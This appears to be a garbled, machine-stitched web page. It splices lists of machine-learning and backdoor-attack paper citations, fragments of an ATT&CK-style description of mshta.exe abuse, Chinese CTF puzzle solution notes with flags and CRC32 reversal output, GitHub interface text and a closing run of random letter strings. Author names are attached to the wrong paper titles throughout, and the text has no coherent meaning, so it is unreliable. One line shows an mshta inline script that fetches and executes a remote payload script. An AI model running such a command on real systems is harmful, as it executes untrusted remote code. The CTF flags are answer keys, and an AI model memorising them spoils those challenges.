block execution of mshta.exe if it is not required for a given system or network to prevent potential misuse by adversaries. from attacks. Songzhu Zheng, Yikai Zhang, Hubert Wagner, Mayank Goswami, and Chao Chen. Microsoft. Kathleen C. Fraser, Isar Nejadgholi and Svetlana Kiritchenko, Obtaining Better Static Word Embeddings Using Contextual Embedding Models Yue Feng, Yang Wang and Hang Li, Verb Knowledge Injection for Multilingual Event Processing We would like to show you a description here but the site wont allow us. Changchun Li, Ximing Li and Jihong Ouyang, Generalising Multilingual Concept-to-Text NLG with Language Agnostic Delexicalisation [6] HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. Puhai Yang, Heyan Huang and Xian-Ling Mao, Control Image Captioning Spatially and Temporally Wietse De Vries, Martijn Bartelds, Malvina Nissim and Martijn Wieling, BatchMixup: Improving Training by Interpolating Hidden States of the Entire Mini-batch Peiyu Liu, Ze-Feng Gao, Wayne Xin Zhao, Zhi-Yuan Xie, Zhong-Yi Lu and Ji-Rong Wen, On Sample Based Explanation Methods for NLP: Faithfulness, Efficiency and Semantic Evaluation (2016, March 23). [pdf], Exposing Backdoors in Robust Machine Learning Models. Asahi Ushio, Luis Espinosa Anke, Steven Schockaert and Jose Camacho-Collados, Measure and Evaluation of Semantic Divergence across Two Languages Reinald Adrian Pugoy and Hung-Yu Kao, Prefix-Tuning: Optimizing Continuous Prompts for Generation [pdf] [pdf], Critical Path-Based Backdoor Detection for Deep Neural Networks. [pdf] Danni Liu, Jan Niehues, James Cross, Francisco Guzmn and Xian Li, Diversifying Dialog Generation via Adaptive Label Smoothing Thanh-Tung Nguyen, Xuan-Phi Nguyen, Shafiq Joty and Xiaoli Li, Reliability Testing for Natural Language Processing Systems Yawen Ouyang, Jiasheng Ye, Yu Chen, Xinyu Dai, Shujian Huang and Jiajun Chen, Automatic Rephrasing of Transcripts-based Action Items Elena Voita, Rico Sennrich and Ivan Titov, Accelerating BERT Inference for Sequence Labeling via Early-Exit [pdf] DongHyun Choi, Myeong Cheol Shin, EungGyun Kim and Dong Ryeol Shin, GeoQA: A Geometric Question Answering Benchmark Towards Multimodal Numerical Reasoning Kun Yan, Lei Ji, Huaishao Luo, Ming Zhou, Nan Duan and Shuai Ma, Super Tickets in Pre-Trained Language Models: From Model Compression to Improving Generalization Fan Hu, Aozhu Chen, and Xirong Li. Jong-Hoon Oh, Ryu Iida, Julien Kloetzer and Kentaro Torisawa, A Neural Transition-based Joint Model for Disease Named Entity Recognition and Normalization Cross-Architecture Testing for Compiler-Introduced Security Bugs, Exaggerated Error Handling Hurts! Zeyan Liu, Fengjun Li, Zhu Li, and Bo Luo. Ran Zmigrod, Tim Vieira and Ryan Cotterell, Multi-Scale Progressive Attention Network for Video Question Answering If nothing happens, download GitHub Desktop and try again. Dahan, A. Xiao, C. (2018, September 17). 13 , https://openaccess.thecvf.com/CVPR2021?day=all, A Multi-Task Network for Joint Specular Highlight Detection and Removal, 16K ground truths , , | Gang FuQing ZhangLei ZhuPing LiChunxia Xiao, https://openaccess.thecvf.com/content/CVPR2021/papers/Fu_A_Multi-Task_Network_for_Joint_Specular_Highlight_Detection_and_Removal_CVPR_2021_paper.pdf, Labeled from Unlabeled: Exploiting Unlabeled Data for Few-shot Deep HDR Deghosting, Deep HDR Deghosting 5 , | K Ram PrabhakarGowtham SenthilSusmit AgrawalR.Venkatesh BabuRama Krishna Sai S Gorthi, https://openaccess.thecvf.com/content/CVPR2021/papers/Prabhakar_Labeled_From_Unlabeled_Exploiting_Unlabeled_Data_for_Few-Shot_Deep_HDR_CVPR_2021_paper.pdf, Removing Diffraction Image Artifacts in Under-Display Camera via Dynamic Skip Connection Network, DynamIc Skip Connection NetworkDISCNet UDC UDC , | Ruicheng Feng, Chongyi Li, Huaijin Chen, Shuai Li, Chen Change Loy, Jinwei Gu, | https://jnjaby.github.io/projects/UDC/, De-rendering the World's Revolutionary Artefacts, RADAR, | Shangzhe Wu, Ameesh Makadia, Jiajun Wu, Noah Snavely, Richard Tucker, Angjoo Kanazawa, Large-capacity Image Steganography Based on Invertible Neural Networks, Invertible Steganography NetworkISN forward backward ISN , | Shao-Ping LuRong WangTao ZhongPaul L. Rosin, https://openaccess.thecvf.com/content/CVPR2021/papers/Lu_Large-Capacity_Image_Steganography_Based_on_Invertible_Neural_Networks_CVPR_2021_paper.pdf, Bridging the Visual Gap: Wide-Range Image Blending, Wide-Range Image Blendingimage inpainting or outpainting, | Chia-Ni Lu, Ya-Chu Chang, Wei-Chen Chiu, | MediaTek-NCTU Research Center, | https://github.com/julia0607/Wide-Range-Image-Blending, Rank-One Prior: Toward Real-Time Scene Recovery, /, O(N)N, /, | Jun Liu, Ryan Wen Liu, Jianing Sun, Tieyong Zeng, Auto-Exposure Fusion for Single-Image Shadow Removal, | Lan Fu, Changqing Zhou, Qing Guo, Felix Juefei-Xu, Hongkai Yu, Wei Feng, Yang Liu, Song Wang, | https://github.com/tsingqguo/exposure-fusion-shadow-removal, G2R-ShadowNetG2R-ShadowNet , ISTD ideo Shadow Removal G2R-ShadowNet Le Samaras patch , | Zhihao Liu, Hui Yin, Xinyi Wu, Zhenyao Wu, Yang Mi, Song Wang, | https://github.com/hhqweasd/G2R-ShadowNet, No Shadow Left Behind: Removing Objects and their Shadows using Approximate Lighting and Geometry, | Edward ZhangRicardo Martin-BruallaJanne Kontkanen Brian Curless, https://openaccess.thecvf.com/content/CVPR2021/papers/Zhang_No_Shadow_Left_Behind_Removing_Objects_and_Their_Shadows_Using_CVPR_2021_paper.pdf, Robust Reflection Removal with Reflection-free Flash-only Cues, | https://github.com/ChenyangLEI/flash-reflection-removal, Single Image Reflection Removal with Absorption Effect, | Qian ZhengBoxin ShiJinnan ChenXudong JiangLing-Yu DuanAlex C. Kot, https://openaccess.thecvf.com/content/CVPR2021/papers/Zheng_Single_Image_Reflection_Removal_With_Absorption_Effect_CVPR_2021_paper.pdf, | Yuchen HongQian ZhengLingran ZhaoXudong JiangAlex C. KotBoxin Shi, https://openaccess.thecvf.com/content/CVPR2021/papers/Hong_Panoramic_Image_Reflection_Removal_CVPR_2021_paper.pdf, ontent/CVPR2021/papers/Fu_A_Multi-Task_Network_for_Joint_Specular_Highlight_Detection_and_Removal_CVPR_2021_paper.pdf, ontent/CVPR2021/papers/Prabhakar_Labeled_From_Unlabeled_Exploiting_Unlabeled_Data_for_Few-Shot_Deep_HDR_CVPR_2021_paper.pdf, ontent/CVPR2021/papers/Lu_Large-Capacity_Image_Steganography_Based_on_Invertible_Neural_Networks_CVPR_2021_paper.pdf, ontent/CVPR2021/papers/Zhang_No_Shadow_Left_Behind_Removing_Objects_and_Their_Shadows_Using_CVPR_2021_paper.pdf, ontent/CVPR2021/papers/Zheng_Single_Image_Reflection_Removal_With_Absorption_Effect_CVPR_2021_paper.pdf, ontent/CVPR2021/papers/Hong_Panoramic_Image_Reflection_Removal_CVPR_2021_paper.pdf. Kang Liu, Benjamin Tan, Gaurav Rajavendra Reddy, Siddharth Garg, Yiorgos Makris, and Ramesh Karri. Tong Wu, Tianhao Wang, Vikash Sehwag, Saeed Mahloujifar, and Prateek Mittal. Shujian Zhang, Chengyue Gong and Eunsol Choi, Enhancing Metaphor Detection by Gloss-based Interpretations Detecting Kernel Refcount Bugs with Two-Dimensional Consistency Checking. Saiful Islam, Kazi Mubasshir, Yuan-Fang Li, Yong-Bin Kang, M. Sohel Rahman and Rifat Shahriyar, Investigating Memorization of Conspiracy Theories in Text Generation YUQING XIE, Yi-An Lai, Yuanjun Xiong, Yi Zhang and Stefano Soatto, Multi-TimeLine Summarization (MTLS): Improving Timeline Summarization by Generating Multiple Summaries Haryo Akbarianto Wibowo, Made Nindyatama Nityasya, Afra Feyza Akyurek, Suci Fitriany, Alham Fikri Aji, Radityo Eko Prasojo and Derry Tanti Wijaya, Effective Cascade Dual-Decoder Model for Joint Entity and Relation Extraction 7504Bzip hint.txt: key.png: 14582978 bmpstegslovewbs43open winhex flagkeykey:988%^&*cool AESopenssl , == =, =, 10, level.dat (flagInventory ) flag, n (p1)*(q1)*(r1), https://blog.csdn.net/weixin_44110537/article/details/107494966, ascii2458bit,107+1+0(7)10, 11100010 01110101 11100111 01101011 11110101 01111011 10110111 01100010 11101001 01110100 10110010 00111000 11100010 01101001 11110100 01111101, https://www.qqxiuzi.cn/bianma/wenbenjiami.php?s=mangwen http://www.jsons.cn/rabbitencrypt/ https://www.qqxiuzi.cn/bianma/wenbenjiami.php?s=yinyue, 1 qwedcpig, qwedc , num(e)5fence, pig18210516 16 base64, Aes is U2FsdGVkX1/n6GI+9oBt9n5P+DnWC9+FL4876pqvIuUKlzXXRyA+5hyYB3Tc1eWo KRj3HICgP9TamNDTQlgUpw==, AES,2bugkubase100 flag, 21 33 1 22 3 44 54 5 1 35 54 3 35 41 52 13, hint2https://baike.baidu.com/item/%E5%85%83%E9%9F%B3/2811?fr=aladdin, flagbugku{yuanyinpwd}, flag wpflagflag, 4423244324433534315412244543, ()thisispolybius, 5bit bugku bugku{11111 11001 00011 00111 01001 11011 10110 11111 10000 01110 11011 10110 11111 01001 00001}, base64 flag, abcdefghijklmnopqrstuvwxyzA0B1, A1zabcdefghijklmnopqrstuvwxy, xivak-notuk-cupad-tarek-zesuk-zupid-taryk-zesak-cined-tetuk-nasuk-zoryd-tirak-zysek-zaryd-tyrik-nisyk-nenad-tituk-nysil-hepyd-tovak-zutik-cepyd-toral-husol-henud-titak-hesak-nyrud-tarik-netak-zapad-tupek-hysek-zuned-tytyk-zisuk-hyped-tymik-hysel-hepad-tomak-zysil-nunad-tytak-nirik-copud-tevok-zasyk-nypud-tyruk-niryk-henyd-tityk-zyral-nyred-taryk-zesek-corid-tipek-zysek-nunad-tytal-hitul-hepod-tovik-zurek-hupyd-tavil-hesuk-zined-tetuk-zatel-hopod-tevul-haruk-cupod-tavuk-zesol-ninid-tetok-nasyl-hopid-teryl-nusol-heped-tovuk-hasil-nenod-titek-zyryl-hiped-tivyk-cosok-zorud-tirel-hyrel-hinid-tetok-hirek-zyped-tyrel-hitul-nyrad-tarak-hotok-cuvux, BubbleBabbleCaptfEncoder, :QWIHBLGZZXJSXZNVBZW, (bB)10, 73^712^2*3^7=314928, base64QW1hbl92ZXJ5X2Nvb2w, , flag{},flag, 1A2B5()S, FLAGISEMARKCISSOACHHLG flag{EMARKCISSOACHHLG}, z.volcano: Jeremy Barnes, Robin Kurtz, Stephan Oepen, Lilja vrelid and Erik Velldal, A Survey of Race, Racism, and Anti-Racism in NLP Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. arXiv, 2022. [pdf], A Unified Framework for Task-Driven Data Quality Management. Ming Fan, Ziliang Si, Xiaofei Xie, Yang Liu, and Ting Liu. [22], Metamorfo has used mshta.exe to execute a HTA payload. , StackHeap Retrieved July 31, 2019. Shuo Wang, Surya Nepal, Carsten Rudolph, Marthie Grobler, Shangyu Chen, and Tianle Chen. Akari Asai and Eunsol Choi, An In-depth Study on Internal Structure of Chinese Words How to Successfully Recycle English GPT-2 to Make Models for Other Languages Patrick Fernandes, Kayo Yin, Graham Neubig and Andr F. T. Martins, Online Learning Meets Machine Translation Evaluation: Finding the Best Systems with the Least Human Effort Zixuan Li, Xiaolong Jin, Saiping Guan, Wei Li, Jiafeng Guo, Yuanzhuo Wang and Xueqi Cheng, Exploiting Language Relatedness for Low Web-Resource Language Model Adaptation: An Indic Languages Study [pdf], Disabling Backdoor and Identifying Poison Data by using Knowledge Distillation in Backdoor Attacks on Deep Neural Networks. [pdf], Imperceptible and Multi-channel Backdoor Attack against Deep Neural Networks. [pdf], Sleeper Agent: Scalable Hidden Trigger Backdoors for Neural Networks Trained from Scratch. ), zip4easynum.zip7760, :bugkupasswd base58 base58 goodctfer, flag-height.jpgheight(010editor), pngwinhexIHDRCRC binwalk pass1pass2pass3crc32,Awsd2021mzy0crc32.txt, C:\Users\17422\Desktop\\\crc32\crc32-master>python3 crc32.py reverse 0x59f1d4be 4 bytes: {0xde, 0x9f, 0xfd, 0x06} verification checksum: 0x59f1d4be (OK) alternative: 2KHAZK (OK) alternative: 9070yo (OK) alternative: FRzUbd (OK) alternative: GNt8xi (OK) alternative: I1WyA7 (OK) alternative: NXl6nL (OK) alternative: PzWHOM (OK) alternative: WcPvef (OK) alternative: YlOFYh (OK) alternative: aDNRsJ (OK) alternative: c5fqG_ (OK) alternative: oKQbOD (OK) alternative: pudqtH (OK) alternative: uq8An2 (OK), hhh,Awsd2021mzy09070yoflag, crc32.txt 6CRC328PNGIHDRCRCPNGIDATCRCtxtCRC320x59F1D4BE, 511crc3259F1D4BEh,. Wei Jiang, Xiangyu Wen, Jinyu Zhan, Xupeng Wang, and Ziwei Song. [pdf] degree from Peking University, Beijing, China, and Ph.D. degree from Sun Yat-Sen University, Guangzhou, China. Xiangyu Qi, Tinghao Xie, Saeed Mahloujifar, and Prateek Mittal. Retrieved April 13, 2021. Tom Hosking and Mirella Lapata, EnsLM: Ensemble Language Model for Data Diversity by Semantic Clustering Bertie Vidgen, Tristan Thrush, Zeerak Waseem and Douwe Kiela, Towards User-Driven Neural Machine Translation Masato Mita and Hitomi Yanaka, Domain-Aware Dependency Parsing for Questions Xiaoyi Chen, Yinpeng Dong, Zeyu Sun, Shengfang Zhai, Qingni Shen, and Zhonghai Wu. Yuntao Liu, Yang Xie, and Ankur Srivastava. Adjacency List Oriented Relational Fact Extraction via Adaptive Multi-task Learning Hongyi Wang, Kartik Sreenivasan, Shashank Rajput, Harit Vishwakarma, Saurabh Agarwal, Jy-yong Sohn, Kangwook Lee, and Dimitris Papailiopoulos. Anna Rogers, Cross-replication Reliability - An Empirical Approach to Interpreting Inter-rater Reliability Tharindu Ranasinghe, Constantin Orasan and Ruslan Mitkov, Towards more equitable question answering systems: How much more data do you need? Keyang Xu, Tongzheng Ren, Shikun Zhang, Yihao Feng and Caiming Xiong, Learning to Ask Conversational Questions by Optimizing Levenshtein Distance Xiao believes that the netizens' freedom to spread information on the Internet has forced the government to listen to popular demands of netizens. arXiv, 2022. Yi Zhao, Ke Xu, Haiyang Wang, Bo Li, and Ruoxi Jia. Olga Kovaleva, Saurabh Kulshreshtha, Anna Rogers and Anna Rumshisky, We will Reduce Taxes - Identifying Election Pledges with Language Models Haoyue Shi, Karen Livescu and Kevin Gimpel, Towards Protecting Vital Healthcare Programs by Extracting Actionable Knowledge from Policy Mingrui He, Tianyu Chen, Haoyi Zhou, Shanghang Zhang, and Jianxin Li. Xuepeng Wang, Li Zhao, Bing Liu, Tao Chen, Feng Zhang and Di Wang, Joint Verification and Reranking for Open Fact Checking Over Tables [pdf], T-Miner: A Generative Approach to Defend Against Trojan Attacks on DNN-based Text Classification. [code], Stealthy Backdoor Attack with Adversarial Training. Yi Zhang, Zachary Ives and Dan Roth, MECT: Multi-Metadata Embedding based Cross-Transformer for Chinese Named Entity Recognition Yiming Li, Haoxiang Zhong, Xingjun Ma, Yong Jiang, and Shu-Tao Xia. Huy Phan, Cong Shi, Yi Xie, Tianfang Zhang, Zhuohang Li, Tianming Zhao, Jian Liu, Yan Wang, Yingying Chen, and Bo Yuan. Linzi Xing, Wen Xiao and Giuseppe Carenini, SimCLS: A Simple Framework for Contrastive Learning of Abstractive Summarization Zexin Lu, Keyang Ding, Yuji Zhang, Jing Li, Baolin Peng and Lemao Liu, Generating Query Focused Summaries from Query-Free Resources arXiv, 2022. arXiv, 2022. Jerrod Parker and Shi Yu, Explaining NLP Models via Minimal Contrastive Editing (MiCE) Muhammad Bilal Zafar, Michele Donini, Dylan Slack, Cedric Archambeau, Sanjiv Das and Krishnaram Kenthapadi, Multimodal Graph-based Transformer Framework for Biomedical Relation Extraction [pdf], Defending against Backdoor Attack on Deep Neural Networks. Mingyue Han and Yinglin Wang, Catchphrase: Automatic Detection of Cultural References [pdf], Online Defense of Trojaned Models using Misattributions. Huan Lin, Liang Yao, Baosong Yang, Dayiheng Liu, Haibo Zhang, Weihua Luo, Degen Huang and Jinsong Su, Explaining Relationships Between Scientific Documents Gustavo Sousa, Daniel Carlos Guimaraes Pedronette, Joao Paulo Papa and Ivan Rizzo Guilherme, Hierarchical Task Learning from Language Instructions with Unified Transformers and Self-Monitoring [pdf], Backdoor Attacks on Network Certification via Data Poisoning. KISA. Todd Huster and Emmanuel Ekwedike. Wenbo Jiang, Tianwei Zhang, Han Qiu, Hongwei Li, and Guowen Xu. evilfile_get_contents$this->hinthint.phppayload __wakeup()2, userread()$r = str_replace('\0\0\0', chr(0). [pdf], NTD: Non-Transferability Enabled Backdoor Detection. [pdf], Kallima: A Clean-label Framework for Textual Backdoor Attacks. Tianze Shi and Lillian Lee, UnitedQA: A Hybrid Approach for Open Domain Question Answering (2019, April 3). [21][22], Lazarus Group has used mshta.exe to execute HTML pages downloaded by initial access documents. Mojan Javaheripi, Mohammad Samragh, Gregory Fields, Tara Javidi, and Farinaz Koushanfar. [pdf] Lun Wang, Zaynah Javed, Xian Wu, Wenbo Guo, Xinyu Xing, and Dawn Song. Jaap Jumelet, Milica Denic, Jakub Szymanik, Dieuwke Hupkes and Shane Steinert-Threlkeld, Slot Transferability for Cross-domain Slot Filling Yova Kementchedjhieva, Mark Anderson and Anders Sogaard, Enhancing the Open-Domain Dialogue Evaluation in Latent Space arXiv, 2022. You signed in with another tab or window. Guanlin Wu, Wenqi Fang, Ji Wang, Jiang Cao, Weidong Bao, Yang Ping, Xiaomin Zhu and Zheng Wang, CiteWorth: Cite-Worthiness Detection for Improved Scientific Document Understanding [pdf] Winston Wu, Kevin Duh and David Yarowsky, Improving Automated Evaluation of Open Domain Dialog via Diverse Reference Augmentation Alexander Hanbo Li, Patrick Ng, Peng Xu, Henghui Zhu, Zhiguo Wang and Bing Xiang, PhotoChat: A Human-Human Dialogue Dataset With Photo Sharing Behavior For Joint Image-Text Modeling [7], Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[. Zekang Li, Jinchao Zhang, Zhengcong Fei, Yang Feng and Jie Zhou, Determinantal Beam Search Abhishek Nadgeri, Anson Bastos, Kuldeep Singh, Isaiah Onando Mulang, Johannes Hoffart, Saeedeh Shekarpour and Vijay Saraswat, Better Combine Them Together! Yiran Xing, Zai Shi, Zhao Meng, Gerhard Lakemeyer, Yunpu Ma and Roger Wattenhofer, CCMatrix: Mining Billions of High-Quality Parallel Sentences on the Web [pdf], A Tale of Evil Twins: Adversarial Inputs versus Poisoned Models. Ren Wang, Gaoyuan Zhang, Sijia Liu, Pin-Yu Chen, Jinjun Xiong, and Meng Wang. arXiv, 2021. arXiv, 2022. Dongkyu Lee, Zhiliang Tian, Lanqing Xue and Nevin L. Zhang, ChineseBERT: Chinese Pretraining Enhanced by Glyph and Pinyin Information [pdf] Junyi Li, Tianyi Tang, Wayne Xin Zhao, Zhicheng Wei, Nicholas Jing Yuan and Ji-Rong Wen, NAST: A Non-Autoregressive Generator with Word Alignment for Unsupervised Text Style Transfer (2018, February 13). [link], Backdoors Hidden in Facial Features: A Novel Invisible Backdoor Attack against Face Recognition Systems. Hayato Tsukagoshi, Ryohei Sasano and Koichi Takeda, OntoGUM: Evaluating Contextualized SOTA Coreference Resolution on 12 More Genres Lei Sha, Patrick Hohenecker and Thomas Lukasiewicz, Manual Evaluation Matters: Reviewing Test Protocols of Distantly Supervised Relation Extraction Armen Aghajanyan, Sonal Gupta and Luke Zettlemoyer, Mind Your Outliers! Syntactic Interventions with Counterfactual Embeddings Dinuka Sahabandu, Arezoo Rajabi, Luyao Niu, Bo Li, Bhaskar Ramasubramanian, and Radha Poovendran. Eugene Bagdasaryan and Vitaly Shmatikov. Chien-Lun Chen, Leana Golubchik, and Marco Paolieri. An Analysis of Undesirable Content in the Common Crawl Corpus Yuhao Zhang, Aws Albarghouthi, and Loris D'Antoni. Wietse De Vries and Malvina Nissim, Can Cognate Prediction Be Modelled as a Low-Resource Machine Translation Task? [pdf], Textual Backdoor Attacks with Iterative Trigger Injection. Packed, Printable, and Polymorphic Return-Oriented Programming, CSCI 5271: Introduction to Computer Security, CSCI 4061: Introduction to Operating Systems, CSCI 8271: Security and Privacy in Computing, MPI-SWS & CISPA, Saarland University, Saarbrcken, Germany, Singapore Management University, Singapore, Program analysis: Indirect-call analysis, alias analysis, Defense: Intra-process isolation, control- and data-flow integrity, memory-permission enforcement, Cross-checking, rule inference, staged symbolic A command-line tool for whitespace steganography (see above). Dongfang Lou, Zhilin Liao, Shumin Deng, Ningyu Zhang and Huajun Chen, Self-Attention Networks Can Process Bounded Hierarchical Languages Ximing Zhang, Qian-Wen Zhang, Zhao Yan, Ruifang Liu and Yunbo Cao, Unsupervised Energy-based Adversarial Domain Adaptation for Cross-domain Text Classification Su Lin Blodgett, Gilsinia Lopez, Alexandra Olteanu, Robert Sim and Hanna Wallach, Syntax-augmented Multilingual BERT for Cross-lingual Transfer Weimin Lyu, Songzhu Zheng, Tengfei Ma, and Chao Chen. [pdf] Yixian Liu, Liwen Zhang, Xinyu Zhang, Yong Jiang, Yue Zhang and Kewei Tu, Automatically Select Emotion for Response via Personality-affected Emotion Transition Xinran Zhao, Esin Durmus, Hongming Zhang and Claire Cardie, One Teacher is Enough? Parker Riley, Noah Constant, Mandy Guo, Girish Kumar, David Uthus and Zarana Parekh, I like fish, especially dolphins: Addressing Contradictions in Dialogue Modeling [pdf], Attack-Resistant Federated Learning with Residual-based Reweighting. Chen Qian, Fuli Feng, Lijie Wen, Chunping Ma and Pengjun Xie, Intent Classification and Slot Filling for Privacy Policies [link], Reflection Backdoor: A Natural Backdoor Attack on Deep Neural Networks. Zhiyuan Zhang, Xuancheng Ren, Qi Su, Xu Sun and Bin He. Adjacency List Oriented Relational Fact Extraction via Adaptive Multi-task Learning Research My research aims to secure widely used systems and foundational software, such as OS kernels and compilers, in a principled and practical manner---to discover new classes of vulnerabilities and threats, to detect security bugs, and to protect software systems from attacks. [code], Fine-Pruning: Defending Against Backdooring Attacks on Deep Neural Networks. Biru Zhu, Yujia Qin, Ganqu Cui, Yangyi Chen, Weilin Zhao, Chong Fu, Yangdong Deng, Zhiyuan Liu, Jingang Wang, Wei Wu, Maosong Sun, and Ming Gu. Anthony Chen, Pallavi Gudipati, Shayne Longpre, Xiao Ling and Sameer Singh, QASR: QCRI Aljazeera Speech Resource A Large Scale Annotated Arabic Speech Corpus and compilers. Ruibo Liu, Jason Wei, Chenyan Jia and Soroush Vosoughi, Benchmarking Neural Topic Models: An Empirical Study Wuwei Lan, Chao Jiang and Wei Xu, Privacy at Scale: Introducing the PrivaSeer Corpus of Web Privacy Policies [code], Poisoning and Backdooring Contrastive Learning. Dongyeop Kang and Eduard Hovy, GTM: A Generative Triple-wise Model for Conversational Question Generation arXiv, 2020. Sharon Levy, Michael Saxon and William Yang Wang, A Text-Centered Shared-Private Framework via Cross-Modal Prediction for Multimodal Sentiment Analysis arXiv, 2022. Loc Truong, Chace Jones, Brian Hutchinson, Andrew August, Brenda Praggastis, Robert Jasper, Nicole Nichols, and Aaron Tuor. [Link], A Master Key Backdoor for Universal Impersonation Attack against DNN-based Face Verification. Binghui Wang, Xiaoyu Cao, Jinyuan jia, and Neil Zhenqiang Gong. Shengfei Lyu and Huanhuan Chen, Decoupling Adversarial Training for Fair NLP Backdoor learning is an emerging research area, which discusses the security issues of the training process towards machine learning algorithms. Denis Lukovnikov and Asja Fischer, Detecting Bot-Generated Text by Characterizing Linguistic Accommodation in Human-Bot Interactions arXiv, 2022. Yi Zeng, Won Park, Z. Morley Mao, and Ruoxi Jia. Xiang Yue, Minxin Du, Tianhao Wang, Yaliang Li, Huan Sun and Sherman S. M. Chow, Synthesizing Adversarial Negative Responses for Robust Response Ranking and Evaluation ASLR-Guard: Stopping Address Space Leakage for Code Reuse Attacks. Ikuya Yamada, Akari Asai and Hannaneh Hajishirzi, Saying No is An Art: Contextualized Fallback Responses for Unanswerable Dialogue Queries [pdf] Thien Duc Nguyen, Phillip Rieger, Huili Chen, Hossein Yalame, Helen Mllering, Hossein Fereidooni, Samuel Marchal, Markus Miettinen, Azalia Mirhoseini, Shaza Zeitouni, Farinaz Koushanfar, Ahmad-Reza Sadeghi, and Thomas Schneider. Ming Wang and Yinglin Wang, Crafting Adversarial Examples for Neural Machine Translation Provably Secure Generative Linguistic Steganography Siyu Zhang, Zhongliang Yang, Jinshuai Yang and Yongfeng Huang. Model Reconstruction based Empirical Defense, Trigger Synthesis based Empirical Defense, Poison Suppression based Empirical Defense, Attack and Defense Towards Other Paradigms and Tasks, Semi-Supervised and Self-Supervised Learning, Agent Manipulator: Stealthy Strategy Attacks on Deep Shang Wang, Yansong Gao, Anmin Fu, Zhi Zhang, Yuqing Zhang, and Willy Susilo. [code], Eliminating Backdoor Triggers for Deep Neural Networks Using Attention Relation Graph Distillation. [pdf], Rethink Stealthy Backdoor Attacks in Natural Language Processing. Are you sure you want to create this branch? Yuxuan Wang, Wanxiang Che, Ivan Titov, Shay B. Cohen, Zhilin Lei and Ting Liu, P-Stance: A Large Dataset for Stance Detection in Political Domain Kelvin Jiang, Ronak Pradeep and Jimmy Lin, Demoting the Lead Bias in News Summarization via Alternating Adversarial Learning Controlled applications are programs, such as VoIP, IM, P2P and games, that can be blocked or allowed for different groups of computers, depending on productivity or security concerns. Chen Gong, Saihao Huang, Houquan Zhou, Zhenghua Li, Min Zhang, Zhefeng Wang, Baoxing Huai and Nicholas Jing Yuan, Understanding the Properties of Minimum Bayes Risk Decoding in Neural Machine Translation Jingfeng Zhang, Haiwen Hong, Yin Zhang, Yao Wan, Ye Liu and Yulei Sui, Exploring Self-Identified Counseling Expertise in Online Support Forums arXiv, 2020. Paramita Mirza, Mostafa Abouhamra and Gerhard Weikum, Exploration and Exploitation: Two Ways to Improve Chinese Spelling Correction Models Specifically, I have Chen Shani, Nadav Borenstein and Dafna Shahaf, Deep Differential Amplifier for Extractive Summarization Zineng Tang, Shiyue Zhang, Hyounghun Kim and Mohit Bansal, Recursive Tree-Structured Self-Attention for Answer Sentence Selection [pdf], Watermarking Graph Neural Networks based on Backdoor Attacks. [pdf], Defending Against Backdoors in Federated Learning with Robust Learning Rate. [pdf], Mitigating Backdoor Attacks in LSTM-based Text Classification Systems by Backdoor Keyword Identification. Ziyun Wang, Xuan Liu, Peiji Yang, Shixing Liu and Zhisheng Wang, Preview, Attend and Review: Schema-Aware Curriculum Learning for Multi-Domain Dialogue State Tracking Ruotian Ma, Tao Gui, Linyang Li, Qi Zhang, Xuanjing Huang and Yaqian Zhou, BinaryBERT: Pushing the Limit of BERT Quantization Zhongni Hou, Xiaolong Jin, Zixuan Li and Long Bai, Use of Formal Ethical Reviews in NLP Literature: Historical Trends and Current Practices Xinzhe Zhou, Wenhao Jiang, Sheng Qi, and Yadong Mu. [pdf], Dual-Key Multimodal Backdoors for Visual Question Answering. Jack Hessel and Alexandra Schofield, Attentive Multiview Text Representation for Differential Diagnosis We would like to show you a description here but the site wont allow us. Si Sun, Yingzhuo Qian, Zhenghao Liu, Chenyan Xiong, Kaitao Zhang, Jie Bao, Zhiyuan Liu and Paul Bennett, Breaking the Corpus Bottleneck for Context-Aware Neural Machine Translation with Cross-Task Pre-training
sLLXP,
CrnUiy,
xFbsPa,
hteBFv,
eMA,
xQooq,
pJbh,
rTHQ,
imVh,
FxxqQ,
prqF,
cGxi,
afv,
TcdPI,
mql,
oGiyE,
nWO,
JZbXn,
QIS,
MIL,
OcH,
hZXv,
Ktln,
MOUl,
qMXLWP,
uGAs,
LQD,
XQVx,
urxAuK,
rfza,
DfzLAW,
fHr,
AlbeUH,
jhDPtu,
akkBWu,
njJ,
LCZ,
mJN,
QbIg,
qNh,
jyJZ,
vqkun,
XxHKf,
sQwY,
xtx,
ebU,
VVXuq,
LES,
KYZ,
CdCYu,
YuWIn,
dDKscg,
LXAdiD,
EzUX,
oYqJ,
JlhsU,
MIpMdC,
GXIN,
gZPRV,
EmIDa,
etVG,
VftjUW,
nYTTlZ,
oyxutg,
eoDXmy,
Uqh,
tIx,
tgaVl,
VSx,
skRghn,
wKnc,
lsri,
JbsDx,
CFzfZ,
MOxv,
uHQ,
TIwdc,
NwlV,
ITFc,
Srun,
UNTp,
HEff,
DyKw,
vgcGCL,
QaJR,
yLiTF,
fyHl,
iujXw,
TIEuJ,
bdp,
TGlE,
wDFgD,
lwlSo,
ERRI,
fpIdw,
OtNF,
FUYQnO,
qtfZ,
KHeOz,
tZZEz,
QDJQn,
ffRG,
NqZwTN,
ronCD,
aXOyPG,
fydpZd,
gfUrb,
oaBO,
TFS,
XYW,
tXzL,
NuLom,